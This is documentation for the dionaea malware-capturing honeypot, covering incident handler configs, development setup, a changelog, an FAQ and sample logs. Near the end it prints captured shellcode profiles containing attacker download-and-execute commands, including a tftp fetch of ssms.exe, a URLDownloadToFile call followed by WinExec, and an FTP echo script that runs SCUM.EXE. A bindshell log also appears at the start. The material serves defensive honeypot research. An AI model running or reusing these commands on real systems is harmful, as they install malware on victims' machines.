 dcerpc request: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' opnum 9
 p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'
 profile: [{'return': '0x7c802367', 'args': ['', 'CreateProcessA'], 'call': 'GetProcAddress'},
            ...., {'return': '0', 'args': ['0'], 'call': 'ExitThread'}]
 service: bindshell://1957
 connection 611 remoteshell tcp listen 10.69.53.52:1957
   connection 612 remoteshell tcp accept 10.69.53.52:1957 <- 10.65.34.231:2135
     p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'
     offer: fxp://1:1@10.65.34.231:8218/ssms.exe
     download: 1d419d615dbe5a238bbaa569b3829a23 fxp://1:1@10.65.34.231:8218/ssms.exe
     connection 613 ftpctrl tcp connect 10.69.53.52:37065 -> 10.65.34.231/None:8218
       connection 614 ftpdata tcp listen 10.69.53.52:62087
         connection 615 ftpdata tcp accept 10.69.53.52:62087 <- 10.65.34.231:2308
           p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'

Additionally, you can query the database for many different things, refer to:

• dionaea sql logging 2009/11/06
• post it yourself 2009/12/08
• sqlite performance 2009/12/12
• virustotal fun 2009/12/14
• Andrew Waite’s Blog for mimic-nepstats.py

for more examples how to make use of the database.

ihandlers/log_sqlite.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: log_sqlite
  config:
    file: "@DIONAEA_STATEDIR@/dionaea.sqlite"

ihandlers/nfq.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: nfq
  # nfq can intercept incoming tcp connections during the tcp handshake
  # giving your honeypot the possibility to provide service on
  # ports which are not served by default.
  # refer to the documentation BEFORE using this
  config:
    # 0 = DROP
    nfaction: 0
    throttle:
      window : 30
      limits:
        total: 30
        slot: 30
    timeouts:
      server:
          listen: 5
      client:
        idle: 10
        sustain: 240

ihandlers/p0f.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: p0f
  config:
    # start p0f with
    # sudo p0f -i any -u root -Q /tmp/p0f.sock -q -l
    path: "un:///tmp/p0f.sock"

Upload unique captured binaries to Amazon S3 bucket

ihandlers/s3.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: s3
  config:
    # Upload dionaea captured samples to Amazon AWS S3 bucket
    # Amazon AWS S3 credentials
    access_key_id: "AKIAIXEXAMPLE"
    secret_access_key: "6WVE5LkETVL91nTKgGnm/YxJ+EXAMPLE"
    bucket_name: "my-dionaea-bucket"
    region_name: "eu-west-1"
    # Alternate endpoint URL
    # Normally Boto 3 will automatically construct appropriate URL
    # By default, we can leave this value to blank
    endpoint_url:
    # Whether or not to validate the S3 certificate
    verify: True
    # Specify the destination folder in S3 for the upload
    s3_dest_folder: "dionaea-capture/"

ihandlers/store.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: store

ihandlers/submit_http.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: submit_http
  config:
      # the url to send the submission requests to
      url: "http://example.org/"
      # E-Mail (optional)
      # email: ""
      # username (optional)
      # user:
      # password (optional)
      # pass:

ihandlers/submit_http_post.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: submit_http_post
  config:
    submit:
      file_upload:
        urls:
          - http://example.org/upload
          - http://example.com/file.php
        field_values:
          submit: "Upload file"
        file_fieldname: upload_file

ihandlers/tftp_download.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: tftp_download

This ihandler submits the captured malware samples to the VirusTotal service for further analysis.

apikey

The VirusTotal API-Key.

file

SQLite database file used to cache the results.

ihandlers/virustotal.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: virustotal
  config:
    # grab it from your virustotal account at My account -> My API Key (https://www.virustotal.com/en/user/<username>/apikey/)
    apikey: "........."
    file: "@DIONAEA_STATEDIR@/vtcache.sqlite"
    # comment: "This sample was captured in the wild and uploaded by the dionaea honeypot.\n#honeypot #malware #networkworm"

Use libemu to find and emulate shellcodes.

Only continue with the processing pipeline if all conditions match.

protocols

Comma separated list of connection types.

types

Comma separated list of connection types.

• accept - dionaea accepts a new connection from a remote host
• connect - dionaea makes a connection to a remote host

This processor can dump a connection as bi-directional stream. The dump can be used to replay an attack on ip-level without messing with pcap and tcpreplay.

path

Dumps will be created in this directory.

Bug reports are very welcome. Please file them on the GitHub issue tracker. Good bug reports come with extensive descriptions of the error and how to reproduce it.

All patches to dionaea should be submitted in the form of pull requests to the main dionaea repository, DinoTools/dionaea. These pull requests should satisfy the following properties:

• The pull request should focus on one particular improvement to dionaea.
• Create different pull requests for unrelated features or bugfixes.
• Python code should follow PEP 8, especially in the “do what code around you does” sense.

When introducing new functionality, please remember to write documentation.

• Download and install the latest version of git

• Configure git with your username and email

  $ git config user.name 'Your Name'
  $ git config user.email 'your.email@example.org'

• Make sure you have a GitHub account
• Fork dionaea to your GitHub account by using the Fork button

• Clone the main repository locally

  $ git clone https://github.com/DinoTools/dionaea.git
  $ cd dionaea

• Add your fork as a remote to push your work to. Replace <username> with your username.

  $ git remote add fork https://github.com/<username>/dionaea

• Install pre-commit by using a virtualenv.

  $ python3 -m venv venv_git
  $ source venv_git/bin/activate
  $ pip install pre-commit

• Install pre-commit hooks.

  $ pre-commit install

Finally, pull requests must be reviewed before merging. Everyone can perform reviews; this is a very valuable way to contribute, and is highly encouraged.

1. Placement:

   The SPDX license identifier in source files shall be added at the first possible position in a file which can contain a comment.

2. Style:

   The SPDX license identifier is added in form of a comment.  The comment style depends on the file type:

   C source and header:

   /**
    * This file is part of the dionaea honeypot
    *
    * SPDX-FileCopyrightText: 2019 Jane Doe <jane@example.org>
    *
    * SPDX-License-Identifier: GPL-2.0-or-later
    */

   Python:

   # This file is part of the dionaea honeypot
   #
   # SPDX-FileCopyrightText: 2019 John Doe <john@example.org>
   #
   # SPDX-License-Identifier: GPL-2.0-or-later

   Scripts:

   # This file is part of the dionaea honeypot
   #
   # SPDX-FileCopyrightText: 2019 Jane Doe <jane@example.org>
   #
   # SPDX-License-Identifier: GPL-2.0-or-later

   .rst:

   ..
       This file is part of the dionaea honeypot
   
       SPDX-FileCopyrightText: 2019 John Doe <john@example.org>
   
       SPDX-License-Identifier: <SPDX License Expression>

   If a specific tool cannot handle the standard comment style, then the appropriate comment mechanism which the tool accepts shall be used. For binary files or files you don’t want to change use an additional file with the same name and .license as suffix.

The REUSE tool is used to validate if all recommendations provided bei the REUSE project of the FSFE are met. For more information about the specification have a look at https://reuse.software/ and https://spdx.dev/

Install the tool.:

$ pip install reuse

Run the linter.:

$ reuse lint

The reuse tool has been included in the pre-commit hooks to check compliance on changed files before committing them.

The docker-compose can be used to setup a development envirnment for dionaea.

$ git clone https://github.com/DinoTools/dionaea.git
$ cd dionaea/dev/docker
$ docker-compose up

To debug dionaea it can be started with gdbserver and gdbgui.

$ git clone https://github.com/DinoTools/dionaea.git
$ cd dionaea/dev/docker
$ docker-compose -f docker-compose.yml -f extra_conf/gdbserver.yml up

The gdbgui frontend is available on the host system http://localhost:5000/. To connect to the gdbserver just select ‘Connect to gdbserver’ and enter dionaea:9999 on the frontend.

All source files are monitored with inotifywait and if a source file changes dionaea is automatically rebuild and restarted.

This section is deprecated and should be updated.

Instead of using Vagrant you can use a Ubuntu 14.04 system to setup your development environment. In this section we will use the scripts used to setup the Vagrant environment to bootstrap a fresh Ubuntu system. If you like you can follow the Installation ‘From Source’ guide to setup everything by hand.

First install Ubuntu.

If everything has been setup correctly clone the git repository and run the bootstrap script.

$ git clone https://github.com/DinoTools/dionaea.git
$ vagrant
$ ./bootstrap.sh

All files will be installed in the /opt/dionaea directory.

Rebuild, install and start dionaea from the root of the git repository.

$ make
$ sudo make install
$ sudo /opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'

This can also be done in one line.

$ make && sudo make install && sudo dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'

To enable AddressSanitizer you have to add the following parameters to the configure script and rebuild dionaea.

--disable-shared CFLAGS="-fsanitize=address -ggdb" CXXFLAGS="-fsanitize=address -ggdb"

When running dionaea it will print information about overfow errors. If you would like to stop execution you have to export an additional environment variable.

export ASAN_OPTIONS='abort_on_error=1'

To get a stacktrace you can use gdb and add an additional breakpoint break __asan_report_error.

It is also possible to use asan_symbolize.py python2 script to extract additional information.

/opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg  2>&1 | python asan_symbolize.py

Logging should be used to report errors and for debugging purposes. It must not be used to report attacks. Incidents should be used for this purpose. For more information have a look at the ihandler section.

Comparison glib2 and Python

WARNING:

In glib2 a critical message means critical warning. But in Python a critical message is handled as critical error.

WARNING:

An error message in glib2 or a critical message in a Python module will terminate the program immediately.

Some of the incidents reported by the dionaea core are listed below.

dionaea.connection.tcp.accept:

A new TCP connection has been accepted by dionaea.

dionaea.connection.tls.accept:

A new SSL/TLS connection has been accepted by dionaea.

dionaea.connection.tcp.connect:

Reporte after dionaea has connection to an external service via TCP.

dionaea.connection.tls.connect:

Reporte after dionaea has connection to an external service via SSL/TLS.

dionaea.connection.udp.connect:

Reporte after dionaea has connection to an external service via UDP.

dionaea.connection.free:

A connection has been closed and freed.

dionaea.connection.tcp.listen:

Fired after a TCP service has been bound and is listening for incomming connections.

dionaea.connection.tls.listen:

Fired after a SSL/TLS service has been bound and is listening for incomming connections.

dionaea.connection.tcp.pending:

dionaea.connection.tcp.reject:

A incoming connection has been rejected by the server.

dionaea.connection.link.early:

dionaea.connection.link:

Reported to give the log management the chance to link two connections.

python

• Add function calls to enable Python thread handling
• Add GIL handling and only ensure the lock if dionaea runs Python code
• Add Timer class and use Python threading

python/pyev

• Remove all source files and build steps from the source tree * pyev seems to be abandoned, no official repo * Use new Timer class

ci

• Add mypy check

dionaea

• Add support for certificate chain files
• Add documentation for touched code

doc

• Update install instructions

python

• Drop Support for Python < 3.6

python/http

• Fix flake8 errors
• Fix issue with default Content-Type (Fixes #252)
• Add support to detect Content-Type by filename
• Add documentation to config
• Add new function to split path and query string (Refs #203)
• Add warnings if Jinja is not available
• Fix issues with template rendering
• Add connection context to template context
• Add improvements to POST request handling
• Add function to add GET vars to template context
• Add example how to use HTML forms in templates

python/printer

• Add initial release of the new printer service (Thanks Michael Neu)
• Add tests for printer service (Thanks Michael Neu)

python/smb

• Add config value to specify port

docker

• Build and push docker images

ci

• Add pre-commit config and fix code
• Add flake8 checks
• Add GitHub workflow to scan for vulnerabilities using CodeQL

dev

• Remove vagrant config

dionaea

• Add licensing information
• Add SPDX header to all files

doc

• Add info about first time setup

ci

• Replace Jenkins with Drone CI

development

• Add docker compose to setup development environment

dionaea

• Improve names of bistrem files (Thanks Aws0mus)
• Fix reconnects with IP only
• Fix dropping privileges (Thanks Michal Ambroz)
• Fix bug to detect if linux/sockios.h is installed

python

• Add class to report more information about connection issues
• Fix support Cython < 0.21
• Add additional information if parsing a YAML file fails
• Change YAML load to safe load
• Replace deprecated API calls with new ones

python/hpfeeds

• Fix to show error message instead of id
• Add option to set reconnect timeout
• Change error handling to send authentication before sending messages (Thanks John Carr)

python/mssql

• Replace warn() with warning()

python/mysql

• Improve detection (Thanks Yorick Koster)

python/s3

• Add new ihandler to upload files to S3 storage (Thanks gento)

python/virustotal

• Add support for custom comments (Thanks Matteo Cantoni)

doc

• Add migration instructions
• Fix warnings

build

• Replace autotools with cmake
• Remove autotools files
• Add git information to version string on development builds

dionaea

• Add option to enable/disable IPv4 mapped IPv6 addresses

build

• Add initial cmake support

ci

• Add Debian 9

dionaea

• Fix build error with OpenSSL 1.1.0
• Improve OpenSSL 1.1.0 support
• Cleanup connection code
• Enable bistream for SSL/TLS connections (Thanks Aws0mus)
• Fixing chroot bugs (Thanks Michal Ambroz)

doc

• Add additional information
• Doxygen config file for dionaea c core
• Ubuntu 16.04 install instructions

package

• Remove old and deprecated debian package config

python

• Fix typo in config key
• Fix hardcoded python path
• Fix compilation on CentOS7 (Thanks Michal Ambroz)

python/http

• Initial support to handle SOAP requests

python/log_incident

• Improve hash generator
• Fix bug if parent is unknown
• Remove IDs from list if processed

python/mongo

• Initial support to simulate a MongoDB server

python/pyev

• Update from 0.8 to 0.9 to support Python >= 3.6

python/smb

• Add support for WannaCry and SambaCry (Big thanks to gento)
• Add additional config options to change identity

python/util

• Find Download commands for Linux shell

dionaea

• Fix build for musl lib

doc

• Fix install instructions
• Extend README.md

python/blackhole

• New service/Initial version

python/emu_scripts

• New handler to analyse downloaded scripts
• Detect VBScript and PowerShell
• Limit number of subdownloads

python/http

• Clean up
• Use state vars instead of strings
• Add template support * Jinja 2 template engine * nginx template

python/mysql

• Dump files from SELECT queries
• Extract URLs from functions
• Variable handler
• Support for selecting variables

python/p0f

• Fix decode error

python/pptp

• Fix error if config is empty

dionaea

• Don’t report ‘connection.free’ incident to early to prevent segmentation faults

dionaea

• Handle byte objects in incidents
• Bump required Python version from 3.2 to 3.4

python/http

• Detect Shellshock attacks

python/log_incident

• Initial support to export raw incident information

python/log_sqlite

• Log credentials from the ftp service

python/memcache

• Initial support for the memcached protocol

python/pptp

• Clean up
• Handle CallClearRequests packets
• Values for hostname, vendor name and firmware revision are now customizable

python/util

• New function to detect shellshock attacks and report detected URLs

doc

• Add information about log levels for developers

python/*

• Replace all critical log messages with error messages
• Catch exceptions in handle_io_in() and handle_io_out() to improve stability
• Catch exceptions in incident handlers

python/sip

• Fix error while reading config values

python/upnp

• Fix errors in log messages

more

• Add templates to create issues and merge requests on github

core

• Initialize stdout logger earlier
• Log error,critical and warning by default

python/*

• In glib2 critical is a critical warning
• Add support for exceptions
• Check file path and show warnings

python/log_json

• Add support for flat object lists to work with ELK stack

core

• Replace lcfg with Key-value file parser from glib

ci

• Add build tests for Ubuntu 14.04, Ubuntu 16.04 and Debian 8

doc

• Add initial documentation for missing modules
• Update documentation to reflact config changes
• Add processor documentation

python/*

• Replace lcfg with yaml configs
• Remove deprecated incident handlers (logxmpp, mwserv, SurfIDS)
• Rename incident handlers from logsql to log_sqlite
• Rename incident handlers from uniqdownload to submit_http_post

python/mysql

• Enable processor pipeline

core

• Code clean up (Thanks to Katarina)
• Vagrant based dev environment
• Customize ssl/tls parameters for autogenerated certificates

doc

• Initial version of sphinx based documentation

python/ftp

• Support to customize response messages
• Small fixes

python/hpfeeds

• Initial ihandler support (Thanks to rep)

python/http

• Customize HTTP response headers
• Return HTTP/1.1 instead of HTTP/1.0

python/log_json

• Initial ihandler support

python/mqtt

• Initial protocol support (Thanks to gento)

python/pptp

• Initial protocol support (Thanks to gento)

python/upnp

• Initial protocol support (Thanks to gento)

core

• Support for cython and cython3
• Fixes to build with glib 2.40
• Remove build warnings
• Support libnl >= 3.2.21

python/http

• Fix unlink() calls

python/virustotal

• virustotal API v2.0

Last commit by original authors.

• Initial release.

I get gcc: command not found?

How to uninstall it?

I get binding.pyx:…: undeclared name not builtin: bytes during the python modules build.

I get Python.h not found during compiling cython

I do not use ubuntu/debian and the instructions are useless for me therefore.

I use Redhat/Centos 5 and the installation is frustrating and a mess as nothing works.

Unable to build.

==> default: cp build/*/dionaea/*.so /opt/dionaea/lib/dionaea/python.so
==> default: cp:
==> default: target ‘/opt/dionaea/lib/dionaea/python.so’ is not a directory

==> default: libtool: Version mismatch error.  This is libtool 2.4.6 Debian-2.4.6-2, but the
==> default: libtool: definition of this LT_INIT comes from libtool 2.4.2.
==> default: libtool: You should recreate aclocal.m4 with macros from libtool 2.4.6 Debian-2.4.6-2
==> default: libtool: and run autoconf again.

git clean -xdf

I get OperationalError at unable to open database file when using logsqlite and it does not work at all

I get a Segmentation Fault

I logrotate, and after logrotate dionaea does not log anymore.

p0f does not work.

I’m facing a bug, it fails, and I can’t figure out why.

Unable to bind to port after dropping privileges

[10052017 15:58:17] connection connection.c:200: bind_local con 0x55f21b1ec720
[10052017 15:58:17] connection connection.c:216: bind_local socket 10 1.2.3.4:21
[10052017 15:58:17] connection connection.c:230: Could not bind 1.2.3.4:21 (Permission denied)

[10052017 15:58:17] connection connection.c:200: bind_local con 0x55f21b1ec720
[10052017 15:58:17] connection connection.c:216: bind_local socket 10 1.2.3.4:21
[10052017 15::58:17] pchild pchild.c:199: sending msg to child to bind port ...
[10052017 15::58:17] pchild pchild.c:218: child could bind the socket!
[10052017 15::58:17] connection connection.c:316: ip '1.2.3.4' node '1.2.3.4:21'

Dionaea does not have and may never will have a function/option to rotate the bistream files. But you can do this by using a cron job and a simple shell script.

Feel free to use and modify the script below.

#!/bin/bash

# Compress bistream files older than 2 days
find /var/lib/dionaea/bistreams/* -type f -mtime +2 -exec gzip {} \;

# Clear bistream logs from dionaea every week
find /var/lib/dionaea/bistreams/* -type f -mtime +7 -exec rm {} \;
find /var/lib/dionaea/bistreams/* -type d -empty -delete

Google:

Google has supported 3 students to work on dionaea during GSoc 2009, GSoc 2010 and GSoc 2011.

SURFnet:

SURFnet has supported the project in the past(2010?-2014?). Working with SURFnet is a real pleasure.

If you are getting frustrated, because things to not work for you and you already read the FAQ, join the ml and share your experience, or the chat.

GitHub

Use the issue tracker to report any problem.

Website: Issue tracker

IRC

From time to time some of the developers join the #nepenthes channel on freenode. irc://irc.freenode.org/nepenthes

Mailing List:

Only a few messages every year. Seems to be dead, no message since 2015.

Website: Mailinglist nepenthes-devel

• GSoC 2009 Project #10 http://honeynet.org/gsoc/project10
• The Honeynet Project

Old documentation:

Once we have the payload, and the profile, dionaea has to guess the intention, and act upon it

This payload offers a shell (cmd.exe prompt) to the attacker, either by binding a port and waiting for the attacker to connect to us again, or by connection to the attacker. In both cases, dionaea offers an cmd.exe emulation to the attacker, parses the input, and acts upon the input, usually the instructions download a file via ftp or tftp.

These shellcodes use the URLDownloadToFile api call to retrieve a file via http, and execute the retrieved file afterwards

Making use of WinExec, these shellcode execute a single command which has to be parsed and processed like the bind/connectback shell shellcommands.

We never know what the second stage is, therefore libemu is used to execute the shellcode in the libemu vm.

The logging section controls … logging, you can specify log domains and loglevel for different logfiles. As dionaea is pretty … verbose, it is useful to rotate the logfiles using logrotate.

# logrotate requires dionaea to be started with a pidfile
# in this case -p /var/run/dionaea.pid
# adjust the path to your needs
/var/log/dionaea*.log {
        notifempty
        missingok
        rotate 28
        daily
        delaycompress
        compress
        create 660 root root
        dateext
        postrotate
                kill -HUP `cat /var/run/dionaea.pid`
        endscript
}

//etc/logrotate.d/dionaea/

downloads specify where to store downloaded malware. bistreams specify where to store bi-directional streams, these are pretty useful when debugging, as they allow to replay an attack on ip-level, without messing with pcap&tcpreplay, which never worked for me. submit specifies where to send files to via http or ftp, you can define a new section within submit if you want to add your own service. listen sets the addresses dionaea will listen to. The default is all addresses it can find, this mode is call getifaddrs, but you can set it to manual and specify a single address if you want to limit it. modules is the most powerfull section, as it specifies the modules to load, and the options for each module.

This section controls the logging to the sqlite database. logsql does not work when chrooting - python makes the path absolute and fails for requests after chroot().

logsql requires the directory where the logsql.sqlite file resides to be writeable by the user, as well as the logsql.sqlite file itself. So, if you drop user privs, make sure the user you drop to is allowed to read/write the file and the directory.

chown MYUSER:MYGROUP /var/lib/dionaea -R

To query the logsql database, I recommend looking at the readlogsqltree.py <#readlogsqltree> script, for visualisation the gnuplotsql <#gnuplotsql> script.

The blog on logsql:

• 2009-11-06 dionaea sql logging
• 2009-12-08 post it yourself
• 2009-12-12 sqlite performance
• 2009-12-14 virustotal fun
• 2009-12-15 paris mission pack avs
• 2010-06-06 data visualisation

This section controls the logging to xmpp services. If you want to use logxmpp, make sure to enable logxmpp in the ihandler section. Using logxmpp allows you to share your new collected files with other sensors anonymously.

The blog on logxmpp:

• 2010-02-10 xmpp backend
• 2010-05-12 xmpp take #2
• 2010-05-15 xmpp take #3

pg_backend <#pg_backend> can be used as a backend for xmpp logging sensors.

Not enabled by default, but recommend: the p0f service, enable by uncommenting p0f in the ihandlers section of the python modules section, and start p0f as suggested in the config. It costs nothing, and gives some pretty cool, even if outdated, informations about the attackers operating system, and you can look them up from the sqlite database, even the rejected connections. If you face problems, here are some hints.

ihandlers section is used to specify which ihandlers get started by ihandlers.py . You do not want to miss p0f and logsql.

services controls which services will get started by services.py

You can access the dionaea.conf via python (readonly):

from dionaea import g_dionaea
g_dionaea.config()

If you use the cli often, you can make it behave like a real shell, including history and completition.:

import rlcompleter, readline
readline.parse_and_bind('tab: complete')

Sometimes it helps to trigger a download, without waiting for an attack. Very useful if you want to verify permissions are correct when switching the user, or making sure a submission to a 3rd party works correctly. You can trigger downloads for all major protocols.

from dionaea.ftp import ftp
f = ftp()
f.download(None, 'anonymous','guest','ftp.kernel.org',21, 'welcome.msg', 'binary','ftp://ftp.kernel.org/welcome.msg')

from dionaea.tftp import TftpClient
t = TftpClient()
t.download(None, 'tftp.example.com', 69, 'filename')

As the http download is not done in python, we do not use the download facility directly, but create an incident, which will trigger the download:

from dionaea.core import incident
i = incident("dionaea.download.offer")
i.set("url", "http://www.honeynet.org")
i.report()

incidents are the ipc used in dionaea.

from dionaea.core import ihandler
class idumper(ihandler):
        def __init__(self, pattern):
                ihandler.__init__(self, pattern)
        def handle(self, icd):
                icd.dump()

a = idumper('*')

Small collection of various shellcode profiles gatherd from dionaea.

This profile will trigger a download via tftp.

p='[{"call": "CreateProcess", "args": ["", "tftp.exe -i 92.17.46.208 get ssms.exe", "", "", "1", "40", "", "", {"dwXCountChars": "0", "dwFillAttribute": "0", "hStdInput": "0", "dwYCountChars": "0", "cbReserved2": "0", "cb": "0", "dwX": "0", "dwY": "0", "dwXSize": "0", "lpDesktop": "0", "hStdError": "68", "dwFlags": "0", "lpReserved": "0", "lpReserved2": "0", "hStdOutput": "0", "lpTitle": "0", "dwYSize": "0", "wShowWindow": "0"}, {"dwProcessId": "4712", "hProcess": "4711", "dwThreadId": "4714", "hThread": "4712"}], "return": "-1"}, {"call": "CreateProcess", "args": ["", "ssms.exe", "", "", "1", "40", "", "", {"dwXCountChars": "0", "dwFillAttribute": "0", "hStdInput": "0", "dwYCountChars": "0", "cbReserved2": "0", "cb": "0", "dwX": "0", "dwY": "0", "dwXSize": "0", "lpDesktop": "0", "hStdError": "68", "dwFlags": "0", "lpReserved": "0", "lpReserved2": "0", "hStdOutput": "0", "lpTitle": "0", "dwYSize": "0", "wShowWindow": "0"}, {"dwProcessId": "4712", "hProcess": "4711", "dwThreadId": "4714", "hThread": "4712"}], "return": "-1"}, {"call": "ExitThread", "args": ["0"], "return": "0"}]'
from dionaea.core import incident
i = incident("dionaea.module.emu.profile")
i.set("profile", str(p))
i.report()

This profile will trigger a download.

p='[{"call": "LoadLibraryA", "args": ["urlmon"], "return": "0x7df20000"}, {"call": "URLDownloadToFile", "args": ["", "http://82.165.32.34/compiled.exe", "47.scr", "0", "0"], "return": "0"}, {"call": "WinExec", "args": ["47.scr", "895"], "return": "32"}]'
from dionaea.core import incident
i = incident("dionaea.module.emu.profile")
i.set("profile", str(p))
i.report()

This profile uses WinExec to create a command file for windows ftp client, downloads a file, and executes the file.:

p='[{"call": "WinExec", "args": ["cmd /c echo open welovewarez.com 21 > i&echo user wat l0l1 >> i &echo get SCUM.EXE >> i &echo quit >> i &ftp -n -s:i &SCUM.EXE\\r\\n", "0"], "return": "32"}, {"call": "ExitThread", "args": ["0"], "return": "0"}]'
from dionaea.core import incident
i = incident("dionaea.module.emu.profile")
i.set("profile", str(p))
i.report()

• Index
• Module Index
• Search Page